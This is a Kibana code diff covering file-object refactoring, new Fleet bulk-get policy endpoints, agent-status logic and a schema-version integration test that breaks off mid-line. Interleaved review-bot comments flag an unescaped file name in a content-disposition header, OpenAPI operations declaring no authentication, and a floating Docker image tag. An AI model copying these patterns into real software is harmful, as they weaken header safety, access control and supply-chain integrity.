expect(auditLogger.log).toHaveBeenCalledWith({ error: undefined, @@ -123,9 +123,9 @@ describe('FileService', () => { it('uploads file content', async () => { const file = await createDisposableFile({ fileKind, name: 'test' }); - expect(file.status).toBe('AWAITING_UPLOAD' as FileStatus); + expect(file.data.status).toBe('AWAITING_UPLOAD' as FileStatus); await file.uploadContent(Readable.from(['upload this'])); - expect(file.status).toBe('READY' as FileStatus); + expect(file.data.status).toBe('READY' as FileStatus); const rs = await file.downloadContent(); const chunks: string[] = []; for await (const chunk of rs) { 
@@ -170,17 +170,17 @@ describe('FileService', () => { meta: { some: 'data' }, }; const updatedFile1 = await file.update(updatableFields); - expect(updatedFile1.meta).toEqual(expect.objectContaining(updatableFields.meta)); - expect(updatedFile1.name).toBe(updatableFields.name); - expect(updatedFile1.alt).toBe(updatableFields.alt); + expect(updatedFile1.data.meta).toEqual(expect.objectContaining(updatableFields.meta)); + expect(updatedFile1.data.name).toBe(updatableFields.name); + expect(updatedFile1.data.alt).toBe(updatableFields.alt); // Fetch the file anew to be doubly sure const updatedFile2 = await fileService.getById({ fileKind, id: file.id }); - expect(updatedFile2.meta).toEqual(expect.objectContaining(updatableFields.meta)); + expect(updatedFile2.data.meta).toEqual(expect.objectContaining(updatableFields.meta)); // Below also tests that our meta type is work as expected by using `some` field. - expect(updatedFile2.meta?.some).toBe(updatableFields.meta.some); - expect(updatedFile2.name).toBe(updatableFields.name); - expect(updatedFile2.alt).toBe(updatableFields.alt); + expect(updatedFile2.data.meta?.some).toBe(updatableFields.meta.some); + expect(updatedFile2.data.name).toBe(updatableFields.name); + expect(updatedFile2.data.alt).toBe(updatableFields.alt); }); it('enforces max size settings', async () => { @@ -339,7 +339,7 @@ describe('FileService', () => { action: 'delete', outcome: 'success', }, - message: expect.stringContaining('Removed share for "myfile"'), + message: expect.stringContaining('Removed share with'), }); }); }); diff --git a/x-pack/plugins/files/server/routes/common.test.ts b/x-pack/plugins/files/server/routes/common.test.ts index cda57b5b6bf13..cc22b0d8afb01 100644 --- a/x-pack/plugins/files/server/routes/common.test.ts +++ b/x-pack/plugins/files/server/routes/common.test.ts 
@@ -16,7 +16,7 @@ describe('getDownloadHeadersForFile', () => { }; } - const file = { name: 'test', mimeType: undefined } as unknown as File; + const file = { data: { name: 'test', mimeType: undefined } } as unknown as File; test('no mime type and name from file object', () => { expect(getDownloadHeadersForFile(file, undefined)).toEqual( t({ ct: 'application/octet-stream', cd: 'test' }) @@ -34,13 +34,13 @@ describe('getDownloadHeadersForFile', () => { ); }); test('mime type and no name', () => { - const fileWithMime = { ...file, mimeType: 'application/pdf' } as File; + const fileWithMime = { data: { ...file.data, mimeType: 'application/pdf' } } as File; expect(getDownloadHeadersForFile(fileWithMime, undefined)).toEqual( t({ ct: 'application/pdf', cd: 'test' }) ); }); test('mime type and name', () => { - const fileWithMime = { ...file, mimeType: 'application/pdf' } as File; + const fileWithMime = { data: { ...file.data, mimeType: 'application/pdf' } } as File; expect(getDownloadHeadersForFile(fileWithMime, 'a cool file.pdf')).toEqual( t({ ct: 'application/pdf', cd: 'a cool file.pdf' }) ); diff --git a/x-pack/plugins/files/server/routes/common.ts b/x-pack/plugins/files/server/routes/common.ts index 23f702493c92d..f8a3a1965267b 100644 --- a/x-pack/plugins/files/server/routes/common.ts +++ b/x-pack/plugins/files/server/routes/common.ts @@ -11,7 +11,7 @@ import type { File } from '../../common/types'; export function getDownloadHeadersForFile(file: File, fileName?: string): ResponseHeaders { return { 'content-type': - (fileName && mime.getType(fileName)) ?? file.mimeType ?? 'application/octet-stream', + (fileName && mime.getType(fileName)) ?? file.data.mimeType ?? 'application/octet-stream', // Note, this name can be overridden by the client if set via a "download" attribute on the HTML tag. 'content-disposition': `attachment; filename="${fileName || getDownloadedFileName(file)}"`, }; 
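Review bot: The `content-disposition` header on the line after the changed one interpolates `fileName` (caller-supplied) or `file.data.name` into a quoted-string without escaping, so a name containing `"` or `\` breaks the header, and through `mime.getType(fileName)` the caller also picks the content-type of the download. Node's HTTP layer rejects CR/LF in header values, but quote-breaking and type selection remain under the client's control. Escape before quoting, e.g. `const safeName = (fileName || getDownloadedFileName(file)).replace(/["\\]/g, '\\$&');` and use it in `'content-disposition': \`attachment; filename="${safeName}"\``, and consider emitting `x-content-type-options: nosniff` alongside. `getDownloadHeadersForFile` starts before the hunk (its signature is only in the hunk header) and its closing brace is outside it.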
@@ -20,8 +20,8 @@ export function getDownloadHeadersForFile(file: File, fileName?: string): Respon export function getDownloadedFileName(file: File): string { // When creating a file we also calculate the extension so the `file.extension` // check is not really necessary except for type checking. - if (file.mimeType && file.extension) { - return `${file.name}.${file.extension}`; + if (file.data.mimeType && file.data.extension) { + return `${file.data.name}.${file.data.extension}`; } - return file.name; + return file.data.name; } diff --git a/x-pack/plugins/files/server/routes/file_kind/upload.ts b/x-pack/plugins/files/server/routes/file_kind/upload.ts index 7b3db76ad38ad..dc6e8e7f4b268 100644 --- a/x-pack/plugins/files/server/routes/file_kind/upload.ts +++ b/x-pack/plugins/files/server/routes/file_kind/upload.ts @@ -50,7 +50,7 @@ export const handler: FileKindsRequestHandler = async ( } throw e; } - const body: Response = { ok: true, size: file.size! }; + const body: Response = { ok: true, size: file.data.size! }; return res.ok({ body }); }; diff --git a/x-pack/plugins/fleet/common/constants/routes.ts b/x-pack/plugins/fleet/common/constants/routes.ts index d46a5f23ddf08..b415328a303d3 100644 --- a/x-pack/plugins/fleet/common/constants/routes.ts +++ b/x-pack/plugins/fleet/common/constants/routes.ts @@ -49,6 +49,7 @@ export const DATA_STREAM_API_ROUTES = { // Package policy API routes export const PACKAGE_POLICY_API_ROUTES = { LIST_PATTERN: `${PACKAGE_POLICY_API_ROOT}`, + BULK_GET_PATTERN: `${PACKAGE_POLICY_API_ROOT}/_bulk_get`, INFO_PATTERN: `${PACKAGE_POLICY_API_ROOT}/{packagePolicyId}`, CREATE_PATTERN: `${PACKAGE_POLICY_API_ROOT}`, UPDATE_PATTERN: `${PACKAGE_POLICY_API_ROOT}/{packagePolicyId}`, 
@@ -61,6 +62,7 @@ export const PACKAGE_POLICY_API_ROUTES = { // Agent policy API routes export const AGENT_POLICY_API_ROUTES = { LIST_PATTERN: `${AGENT_POLICY_API_ROOT}`, + BULK_GET_PATTERN: `${AGENT_POLICY_API_ROOT}/_bulk_get`, INFO_PATTERN: `${AGENT_POLICY_API_ROOT}/{agentPolicyId}`, CREATE_PATTERN: `${AGENT_POLICY_API_ROOT}`, UPDATE_PATTERN: `${AGENT_POLICY_API_ROOT}/{agentPolicyId}`, diff --git a/x-pack/plugins/fleet/common/openapi/bundled.json b/x-pack/plugins/fleet/common/openapi/bundled.json index f7d5054f53224..adb49b25782cd 100644 --- a/x-pack/plugins/fleet/common/openapi/bundled.json +++ b/x-pack/plugins/fleet/common/openapi/bundled.json @@ -2215,6 +2215,66 @@ } } }, + "/agent_policies/_bulk_get": { + "post": { + "summary": "Agent policies - Bulk Get", + "tags": [], + "requestBody": { + "content": { + "application/json": { + "schema": { + "type": "object", + "properties": { + "ids": { + "type": "array", + "items": { + "type": "string" + }, + "description": "list of agent policy ids" + }, + "full": { + "type": "boolean", + "description": "get full policies with package policies populated" + }, + "ignoreMissing": { + "type": "boolean" + } + }, + "required": [ + "ids" + ] + } + } + } + }, + "responses": { + "200": { + "description": "OK", + "content": { + "application/json": { + "schema": { + "type": "object", + "properties": { + "items": { + "type": "array", + "items": { + "$ref": "#/components/schemas/agent_policy" + } + } + }, + "required": [ + "items" + ] + } + } + } + } + }, + "operationId": "bulk-get-agent-policies", + "security": [], + "parameters": [] + } + }, "/agent_policies/delete": { "post": { "summary": "Agent policy - Delete", 
@@ -2706,6 +2766,62 @@ ] } }, + "/package_policies/_bulk_get": { + "post": { + "summary": "Package policies - Bulk Get", + "tags": [], + "requestBody": { + "content": { + "application/json": { + "schema": { + "type": "object", + "properties": { + "ids": { + "type": "array", + "items": { + "type": "string" + }, + "description": "list of package policy ids" + }, + "ignoreMissing": { + "type": "boolean" + } + }, + "required": [ + "ids" + ] + } + } + } + }, + "responses": { + "200": { + "description": "OK", + "content": { + "application/json": { + "schema": { + "type": "object", + "properties": { + "items": { + "type": "array", + "items": { + "$ref": "#/components/schemas/package_policy" + } + } + }, + "required": [ + "items" + ] + } + } + } + } + }, + "operationId": "bulk-get-package-policies", + "security": [], + "parameters": [] + } + }, "/package_policies/delete": { "post": { "summary": "Package policy - Delete", diff --git a/x-pack/plugins/fleet/common/openapi/bundled.yaml b/x-pack/plugins/fleet/common/openapi/bundled.yaml index 60827666ca5e8..3cc16afc3f410 100644 --- a/x-pack/plugins/fleet/common/openapi/bundled.yaml +++ b/x-pack/plugins/fleet/common/openapi/bundled.yaml @@ -1355,6 +1355,45 @@ paths: required: - name description: '' + /agent_policies/_bulk_get: + post: + summary: Agent policies - Bulk Get + tags: [] + requestBody: + content: + application/json: + schema: + type: object + properties: + ids: + type: array + items: + type: string + description: list of agent policy ids + full: + type: boolean + description: get full policies with package policies populated + ignoreMissing: + type: boolean + required: + - ids + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + items: + type: array + items: + $ref: '#/components/schemas/agent_policy' + required: + - items + operationId: bulk-get-agent-policies + security: [] + parameters: [] /agent_policies/delete: post: summary: Agent policy - Delete 
@@ -1662,6 +1701,42 @@ paths: type: boolean parameters: - $ref: '#/components/parameters/kbn_xsrf' + /package_policies/_bulk_get: + post: + summary: Package policies - Bulk Get + tags: [] + requestBody: + content: + application/json: + schema: + type: object + properties: + ids: + type: array + items: + type: string + description: list of package policy ids + ignoreMissing: + type: boolean + required: + - ids + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + items: + type: array + items: + $ref: '#/components/schemas/package_policy' + required: + - items + operationId: bulk-get-package-policies + security: [] + parameters: [] /package_policies/delete: post: summary: Package policy - Delete diff --git a/x-pack/plugins/fleet/common/openapi/entrypoint.yaml b/x-pack/plugins/fleet/common/openapi/entrypoint.yaml index 316ffa6e5679a..2756656e189f2 100644 --- a/x-pack/plugins/fleet/common/openapi/entrypoint.yaml +++ b/x-pack/plugins/fleet/common/openapi/entrypoint.yaml @@ -82,6 +82,8 @@ paths: $ref: 'paths/agent_policies@{agent_policy_id}.yaml' '/agent_policies/{agentPolicyId}/copy': $ref: 'paths/agent_policies@{agent_policy_id}@copy.yaml' + /agent_policies/_bulk_get: + $ref: paths/agent_policies@_bulk_get.yaml /agent_policies/delete: $ref: paths/agent_policies@delete.yaml # Data streams endpoints @@ -99,6 +101,8 @@ paths: # Package policies endpoints /package_policies: $ref: paths/package_policies.yaml + /package_policies/_bulk_get: + $ref: paths/package_policies@_bulk_get.yaml /package_policies/delete: $ref: paths/package_policies@delete.yaml /package_policies/upgrade: diff --git a/x-pack/plugins/fleet/common/openapi/paths/agent_policies@_bulk_get.yaml b/x-pack/plugins/fleet/common/openapi/paths/agent_policies@_bulk_get.yaml new file mode 100644 index 0000000000000..0ac58fffba167 --- /dev/null +++ b/x-pack/plugins/fleet/common/openapi/paths/agent_policies@_bulk_get.yaml 
@@ -0,0 +1,38 @@ +post: + summary: Agent policies - Bulk Get + tags: [] + requestBody: + content: + application/json: + schema: + type: object + properties: + ids: + type: array + items: + type: string + description: list of agent policy ids + full: + type: boolean + description: get full policies with package policies populated + ignoreMissing: + type: boolean + required: + - ids + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + items: + type: array + items: + $ref: ../components/schemas/agent_policy.yaml + required: + - items + operationId: bulk-get-agent-policies + security: [] + parameters: [] diff --git a/x-pack/plugins/fleet/common/openapi/paths/package_policies@_bulk_get.yaml b/x-pack/plugins/fleet/common/openapi/paths/package_policies@_bulk_get.yaml new file mode 100644 index 0000000000000..70d54b12e47eb --- /dev/null +++ b/x-pack/plugins/fleet/common/openapi/paths/package_policies@_bulk_get.yaml @@ -0,0 +1,35 @@ +post: + summary: Package policies - Bulk Get + tags: [] + requestBody: + content: + application/json: + schema: + type: object + properties: + ids: + type: array + items: + type: string + description: list of package policy ids + ignoreMissing: + type: boolean + required: + - ids + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + items: + type: array + items: + $ref: ../components/schemas/package_policy.yaml + required: + - items + operationId: bulk-get-package-policies + security: [] + parameters: [] diff --git a/x-pack/plugins/fleet/common/services/agent_status.ts b/x-pack/plugins/fleet/common/services/agent_status.ts index 59ec2b9babd70..7dbfb88192da8 100644 --- a/x-pack/plugins/fleet/common/services/agent_status.ts +++ b/x-pack/plugins/fleet/common/services/agent_status.ts 
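Review bot: Both new POST operations declare `security: []` and `parameters: []`, which in OpenAPI states that the endpoint needs neither authentication nor any header, whereas the existing POST operations in this spec list the `kbn_xsrf` header (the context at the top of the bundled.yaml `/package_policies/_bulk_get` hunk shows `- $ref: '#/components/parameters/kbn_xsrf'` on the preceding path item). Unless these routes really are unauthenticated, drop `security: []` so the document-level security applies and replace `parameters: []` with `parameters:` / `  - $ref: ../components/parameters/kbn_xsrf.yaml` (path inferred from the sibling `../components/schemas/...` refs; confirm that file exists). A `maxItems` on `ids` would also make the documented contract bound the bulk size.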
@@ -6,11 +6,11 @@ */ import { AGENT_POLLING_THRESHOLD_MS } from '../constants'; -import type { Agent, AgentStatus } from '../types'; +import type { Agent, AgentStatus, FleetServerAgent } from '../types'; const offlineTimeoutIntervalCount = 10; // 30s*10 = 5m timeout -export function getAgentStatus(agent: Agent): AgentStatus { +export function getAgentStatus(agent: Agent | FleetServerAgent): AgentStatus { const { last_checkin: lastCheckIn } = agent; if (!agent.active) { @@ -33,7 +33,15 @@ export function getAgentStatus(agent: Agent): AgentStatus { if (agent.last_checkin_status === 'degraded') { return 'degraded'; } - if (agent.upgrade_started_at && !agent.upgraded_at) { + + const policyRevision = + 'policy_revision' in agent + ? agent.policy_revision + : 'policy_revision_idx' in agent + ? agent.policy_revision_idx + : undefined; + + if (!policyRevision || (agent.upgrade_started_at && !agent.upgraded_at)) { return 'updating'; } if (intervalsSinceLastCheckIn >= offlineTimeoutIntervalCount) { @@ -76,7 +84,7 @@ export function buildKueryForUpgradingAgents(path: string = '') { export function buildKueryForUpdatingAgents(path: string = '') { return `(${buildKueryForUpgradingAgents(path)}) or (${buildKueryForEnrollingAgents( path - )}) or (${buildKueryForUnenrollingAgents(path)})`; + )}) or (${buildKueryForUnenrollingAgents(path)}) or (not ${path}policy_revision_idx:*)`; } export function buildKueryForInactiveAgents(path: string = '') { diff --git a/x-pack/plugins/fleet/common/types/models/agent_policy.ts b/x-pack/plugins/fleet/common/types/models/agent_policy.ts index 40a6c8cdb9b48..44e6b35c02eec 100644 --- a/x-pack/plugins/fleet/common/types/models/agent_policy.ts +++ b/x-pack/plugins/fleet/common/types/models/agent_policy.ts @@ -29,6 +29,7 @@ export interface NewAgentPolicy { data_output_id?: string | null; monitoring_output_id?: string | null; download_source_id?: string | null; + schema_version?: string; } export interface AgentPolicy extends Omit { 
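Review bot: The new `!policyRevision` condition returns `'updating'` before the offline check (`intervalsSinceLastCheckIn >= offlineTimeoutIntervalCount`) that follows it in the hunk, so an agent with no `policy_revision`/`policy_revision_idx` that has not checked in for longer than the timeout is shown as updating rather than offline, which hides exactly the agents an operator most needs to notice; `buildKueryForUpdatingAgents` gains the same `not policy_revision_idx:*` clause unconditionally, so list filters will agree with that classification. If a missing revision is only meaningful for an agent that is still checking in, keep the `policyRevision` computation where it is but evaluate it after the offline return: `if (intervalsSinceLastCheckIn >= offlineTimeoutIntervalCount) return 'offline';` followed by `if (!policyRevision || (agent.upgrade_started_at && !agent.upgraded_at)) return 'updating';`. I cannot tell from this diff how an agent that never received a policy is expected to look, so please confirm the intended precedence. Note also that `!policyRevision` treats revision `0` as missing, which is fine only if revisions start at 1.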
@@ -60,6 +61,7 @@ export interface FullAgentPolicyInput { type: string; data_stream: { namespace: string }; use_output: string; + package_policy_id: string; meta?: { package?: Pick; [key: string]: unknown; diff --git a/x-pack/plugins/fleet/common/types/rest_spec/agent_policy.ts b/x-pack/plugins/fleet/common/types/rest_spec/agent_policy.ts index d53da769c754b..a62b1a1b9e4e6 100644 --- a/x-pack/plugins/fleet/common/types/rest_spec/agent_policy.ts +++ b/x-pack/plugins/fleet/common/types/rest_spec/agent_policy.ts @@ -7,7 +7,7 @@ import type { AgentPolicy, NewAgentPolicy, FullAgentPolicy } from '../models'; -import type { ListResult, ListWithKuery } from './common'; +import type { ListResult, ListWithKuery, BulkGetResult } from './common'; export interface GetAgentPoliciesRequest { query: ListWithKuery & { @@ -17,6 +17,7 @@ export interface GetAgentPoliciesRequest { export type GetAgentPoliciesResponseItem = AgentPolicy & { agents?: number }; +export type BulkGetAgentPoliciesResponse = BulkGetResult; export type GetAgentPoliciesResponse = ListResult; export interface GetOneAgentPolicyRequest { diff --git a/x-pack/plugins/fleet/common/types/rest_spec/common.ts b/x-pack/plugins/fleet/common/types/rest_spec/common.ts index 7a0390d830de3..07bd3c7019c16 100644 --- a/x-pack/plugins/fleet/common/types/rest_spec/common.ts +++ b/x-pack/plugins/fleet/common/types/rest_spec/common.ts @@ -21,3 +21,7 @@ export interface ListResult { page: number; perPage: number; } + +export interface BulkGetResult { + items: T[]; +} diff --git a/x-pack/plugins/fleet/common/types/rest_spec/package_policy.ts b/x-pack/plugins/fleet/common/types/rest_spec/package_policy.ts index 260c8ebc8142f..c7de1bd489b47 100644 --- a/x-pack/plugins/fleet/common/types/rest_spec/package_policy.ts +++ b/x-pack/plugins/fleet/common/types/rest_spec/package_policy.ts 
@@ -14,13 +14,14 @@ import type { FullAgentPolicyInput, } from '../models'; -import type { ListResult, ListWithKuery } from './common'; +import type { BulkGetResult, ListResult, ListWithKuery } from './common'; export interface GetPackagePoliciesRequest { query: ListWithKuery; } export type GetPackagePoliciesResponse = ListResult; +export type BulkGetPackagePoliciesResponse = BulkGetResult; export interface GetOnePackagePolicyRequest { params: { diff --git a/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_details_page/components/agent_details/agent_details_overview.tsx b/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_details_page/components/agent_details/agent_details_overview.tsx index b87b09c7f58c4..f3023e718eacf 100644 --- a/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_details_page/components/agent_details/agent_details_overview.tsx +++ b/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_details_page/components/agent_details/agent_details_overview.tsx @@ -69,7 +69,7 @@ export const AgentDetailsOverviewSection: React.FunctionComponent<{ defaultMessage: 'Agent policy', }), description: agentPolicy ? ( - + ) : ( agent.policy_id || '-' ), diff --git a/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_list_page/index.tsx b/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_list_page/index.tsx index 471c26f89123d..a9e3429732b3c 100644 --- a/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_list_page/index.tsx +++ b/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_list_page/index.tsx @@ -449,7 +449,7 @@ export const AgentListPage: React.FunctionComponent<{}> = () => { return ( - {agentPolicy && } + {agentPolicy && } {showWarning && ( 
diff --git a/x-pack/plugins/fleet/public/components/link_and_revision.test.tsx b/x-pack/plugins/fleet/public/components/link_and_revision.test.tsx new file mode 100644 index 0000000000000..f2d0a8970cfa3 --- /dev/null +++ b/x-pack/plugins/fleet/public/components/link_and_revision.test.tsx @@ -0,0 +1,51 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; + +import type { TestRenderer } from '../mock'; +import { createFleetTestRendererMock } from '../mock'; + +import type { AgentPolicy, Agent } from '../types'; + +import { AgentPolicySummaryLine } from './link_and_revision'; + +jest.mock('../hooks/use_fleet_status', () => ({ + FleetStatusProvider: (props: any) => { + return props.children; + }, + useFleetStatus: jest.fn().mockReturnValue({}), +})); + +describe('AgentPolicySummaryLine', () => { + let testRenderer: TestRenderer; + + const render = (agentPolicy: AgentPolicy, agent?: Agent) => + testRenderer.render(); + + beforeEach(() => { + testRenderer = createFleetTestRendererMock(); + }); + + test('it should render policy and revision if no agent is provided', async () => { + const results = render({ name: 'test', revision: 2 } as AgentPolicy); + expect(results.container.textContent).toBe('testrev. 2'); + }); + + test('it should render policy without revision if the agent do not have revision', async () => { + const results = render({ name: 'test', revision: 1 } as AgentPolicy, {} as Agent); + expect(results.container.textContent).toBe('test'); + }); + + test('it should render policy with agent revision if an agent is provided', async () => { + const results = render( + { name: 'test', revision: 2 } as AgentPolicy, + { policy_revision: 1 } as Agent + ); + expect(results.container.textContent).toBe('testrev. 1'); + }); +}); 
diff --git a/x-pack/plugins/fleet/public/components/link_and_revision.tsx b/x-pack/plugins/fleet/public/components/link_and_revision.tsx index b56787fbb399c..64d4fa043e160 100644 --- a/x-pack/plugins/fleet/public/components/link_and_revision.tsx +++ b/x-pack/plugins/fleet/public/components/link_and_revision.tsx @@ -11,49 +11,54 @@ import { FormattedMessage } from '@kbn/i18n-react'; import type { CSSProperties } from 'react'; import React, { memo } from 'react'; -import type { AgentPolicy } from '../../common/types'; +import type { AgentPolicy, Agent } from '../../common/types'; import { useLink } from '../hooks'; const MIN_WIDTH: CSSProperties = { minWidth: 0 }; const NO_WRAP_WHITE_SPACE: CSSProperties = { whiteSpace: 'nowrap' }; -export const AgentPolicySummaryLine = memo<{ policy: AgentPolicy }>(({ policy }) => { - const { getHref } = useLink(); - const { name, id, revision, is_managed: isManaged } = policy; - return ( - - - - {name || id} - - - {isManaged && ( - - )} - {revision && ( - - - - +export const AgentPolicySummaryLine = memo<{ policy: AgentPolicy; agent?: Agent }>( + ({ policy, agent }) => { + const { getHref } = useLink(); + const { name, id, is_managed: isManaged } = policy; + + const revision = agent ? agent.policy_revision : policy.revision; + + return ( + + + + {name || id} + - )} - - ); -}); + {isManaged && ( + + )} + {revision && ( + + + + + + )} + + ); + } +); diff --git a/x-pack/plugins/fleet/server/constants/fleet_es_assets.ts b/x-pack/plugins/fleet/server/constants/fleet_es_assets.ts index 8b9402054fb0a..001aa0caf6a47 100644 --- a/x-pack/plugins/fleet/server/constants/fleet_es_assets.ts +++ b/x-pack/plugins/fleet/server/constants/fleet_es_assets.ts 
@@ -11,6 +11,8 @@ const meta = getESAssetMetadata(); export const FLEET_INSTALL_FORMAT_VERSION = '1.0.0'; +export const FLEET_AGENT_POLICIES_SCHEMA_VERSION = '1.0.0'; + export const FLEET_FINAL_PIPELINE_ID = '.fleet_final_pipeline-1'; export const FLEET_GLOBALS_COMPONENT_TEMPLATE_NAME = '.fleet_globals-1'; diff --git a/x-pack/plugins/fleet/server/constants/index.ts b/x-pack/plugins/fleet/server/constants/index.ts index 36f0cac1c4be8..87f0b5eeedfcf 100644 --- a/x-pack/plugins/fleet/server/constants/index.ts +++ b/x-pack/plugins/fleet/server/constants/index.ts @@ -76,4 +76,5 @@ export { FLEET_FINAL_PIPELINE_CONTENT, FLEET_FINAL_PIPELINE_VERSION, FLEET_INSTALL_FORMAT_VERSION, + FLEET_AGENT_POLICIES_SCHEMA_VERSION, } from './fleet_es_assets'; diff --git a/x-pack/plugins/fleet/server/errors/index.ts b/x-pack/plugins/fleet/server/errors/index.ts index d0aca78fce5ef..713804d8a36f7 100644 --- a/x-pack/plugins/fleet/server/errors/index.ts +++ b/x-pack/plugins/fleet/server/errors/index.ts @@ -54,6 +54,7 @@ export class ConcurrentInstallOperationError extends IngestManagerError {} export class AgentReassignmentError extends IngestManagerError {} export class PackagePolicyIneligibleForUpgradeError extends IngestManagerError {} export class PackagePolicyValidationError extends IngestManagerError {} +export class PackagePolicyNotFoundError extends IngestManagerError {} export class BundledPackageNotFoundError extends IngestManagerError {} export class HostedAgentPolicyRestrictionRelatedError extends IngestManagerError { constructor(message = 'Cannot perform that action') { diff --git a/x-pack/plugins/fleet/server/integration_tests/__snapshots__/cloud_preconfiguration.test.ts.snap b/x-pack/plugins/fleet/server/integration_tests/__snapshots__/cloud_preconfiguration.test.ts.snap index 4f77db4063dc0..c6b5aae0f1868 100644 --- a/x-pack/plugins/fleet/server/integration_tests/__snapshots__/cloud_preconfiguration.test.ts.snap 
+++ b/x-pack/plugins/fleet/server/integration_tests/__snapshots__/cloud_preconfiguration.test.ts.snap @@ -25,6 +25,7 @@ Object { }, }, "name": "Fleet Server", + "package_policy_id": "elastic-cloud-fleet-server", "revision": 1, "server": Object { "host": "0.0.0.0", @@ -122,6 +123,7 @@ Object { }, }, "name": "Elastic APM", + "package_policy_id": "elastic-cloud-apm", "revision": 1, "type": "apm", "use_output": "es-containerhost", diff --git a/x-pack/plugins/fleet/server/integration_tests/helpers/docker_registry_helper.ts b/x-pack/plugins/fleet/server/integration_tests/helpers/docker_registry_helper.ts index 60f68f135ba55..35c698675e7c9 100644 --- a/x-pack/plugins/fleet/server/integration_tests/helpers/docker_registry_helper.ts +++ b/x-pack/plugins/fleet/server/integration_tests/helpers/docker_registry_helper.ts @@ -18,7 +18,7 @@ import pRetry from 'p-retry'; const BEFORE_SETUP_TIMEOUT = 30 * 60 * 1000; // 30 minutes; const DOCKER_START_TIMEOUT = 5 * 60 * 1000; // 5 minutes -const DOCKER_IMAGE = `docker.elastic.co/package-registry/distribution:433d99a96f3289c5013ae35826877adf408eb9c9`; +const DOCKER_IMAGE = `docker.elastic.co/package-registry/distribution:production-v2-experimental`; function firstWithTimeout(source$: Rx.Observable, errorMsg: string, ms = 30 * 1000) { return Rx.race( diff --git a/x-pack/plugins/fleet/server/integration_tests/upgrade_agent_policy_schema_version.test.ts b/x-pack/plugins/fleet/server/integration_tests/upgrade_agent_policy_schema_version.test.ts new file mode 100644 index 0000000000000..39c3cee2fdeb1 --- /dev/null +++ b/x-pack/plugins/fleet/server/integration_tests/upgrade_agent_policy_schema_version.test.ts 
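Review bot: `DOCKER_IMAGE` moves from an immutable commit tag (`distribution:433d99a…`) to the floating tag `production-v2-experimental`, so every integration run now pulls whatever that tag currently points at: results become non-reproducible between runs and a repointed or compromised tag is consumed silently by CI. Pin by digest, e.g. `const DOCKER_IMAGE = 'docker.elastic.co/package-registry/distribution:production-v2-experimental@sha256:<digest>';` (the digest cannot be recovered from this diff; take it from the current tag), or at minimum keep a commit-sha tag and bump it deliberately. If tracking the moving tag is intentional, leave a comment on this line saying so and why.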
@@ -0,0 +1,178 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import uuid from 'uuid/v4'; + +import type { + KibanaRequest, + SavedObjectsClientContract, + ElasticsearchClient, +} from '@kbn/core/server'; +import * as kbnTestServer from '@kbn/core/test_helpers/kbn_server'; +import type { SearchTotalHits } from '@elastic/elasticsearch/lib/api/types'; + +import { AGENT_POLICY_SAVED_OBJECT_TYPE, FLEET_AGENT_POLICIES_SCHEMA_VERSION } from '../constants'; +import { upgradeAgentPolicySchemaVersion } from '../services/setup/upgrade_agent_policy_schema_version'; +import { AGENT_POLICY_INDEX } from '../../common'; +import { agentPolicyService } from '../services'; + +import { useDockerRegistry, waitForFleetSetup } from './helpers'; + +const fakeRequest = { + headers: {}, + getBasePath: () => '', + path: '/', + route: { settings: {} }, + url: { + href: '/', + }, + raw: { + req: { + url: '/', + }, + }, +} as unknown as KibanaRequest; + +describe('upgrade agent policy schema version', () => { + let esServer: kbnTestServer.TestElasticsearchUtils; + let kbnServer: kbnTestServer.TestKibanaUtils; + + const registryUrl = useDockerRegistry(); + + const startServers = async () => { + const { startES } = kbnTestServer.createTestServers({ + adjustTimeout: (t) => jest.setTimeout(t), + settings: { + es: { + license: 'trial', + }, + kbn: {}, + }, + }); + + esServer = await startES(); + const startKibana = async () => { + const root = kbnTestServer.createRootWithCorePlugins( + { + xpack: { + fleet: { + registryUrl, + packages: [ + { + name: 'fleet_server', + version: 'latest', + }, + { + name: 'system', + version: 'latest', + }, + ], + }, + }, + }, + { oss: false } + ); + + await root.preboot(); + const coreSetup = await root.setup(); + const coreStart = await root.start(); + 
+ return { + root, + coreSetup, + coreStart, + stop: async () => await root.shutdown(), + }; + }; + kbnServer = await startKibana(); + + await waitForFleetSetup(kbnServer.root); + }; + + const stopServers = async () => { + if (kbnServer) { + await kbnServer.stop(); + } + + if (esServer) { + await esServer.stop(); + } + + await new Promise((res) => setTimeout(res, 10000)); + }; + + // Share the same servers for all the test to make test a lot faster (but test are not isolated anymore) + beforeAll(async () => { + await startServers(); + }); + + afterAll(async () => { + await stopServers(); + }); + + describe('with package installed with outdated schema version', () => { + let soClient: SavedObjectsClientContract; + let esClient: ElasticsearchClient; + + beforeAll(async () => { + soClient = kbnServer.coreStart.savedObjects.getScopedClient(fakeRequest, { + excludedWrappers: ['security'], + }); + esClient = kbnServer.coreStart.elasticsearch.client.asInternalUser; + }); + + it('should correctly upgrade schema version', async () => { + await esClient.indices.create({ index: AGENT_POLICY_INDEX }); + let esRes = await esClient.search({ index: AGENT_POLICY_INDEX }); + expect((esRes.hits.total as SearchTotalHits).value).toBe(0); + + await soClient.bulkCreate([ + // up-to-date schema_version + { + type: AGENT_POLICY_SAVED_OBJECT_TYPE, + id: uuid(), + attributes: { + schema_version: FLEET_AGENT_POLICIES_SCHEMA_VERSION, + revision: 1, + }, + }, + // out-of-date schema_version + { + type: AGENT_POLICY_SAVED_OBJECT_TYPE, + id: uuid(), + attributes: { + schema_version: '0.0.1', + revision: 1, + }, + }, + // missing schema_version + { + type: AGENT_POLICY_SAVED_OBJECT_TYPE, + id: uuid(), + attributes: { + revision: 1, + }, + }, + ]); + + await upgradeAgentPolicySchemaVersion(soClient); + + const policies = await 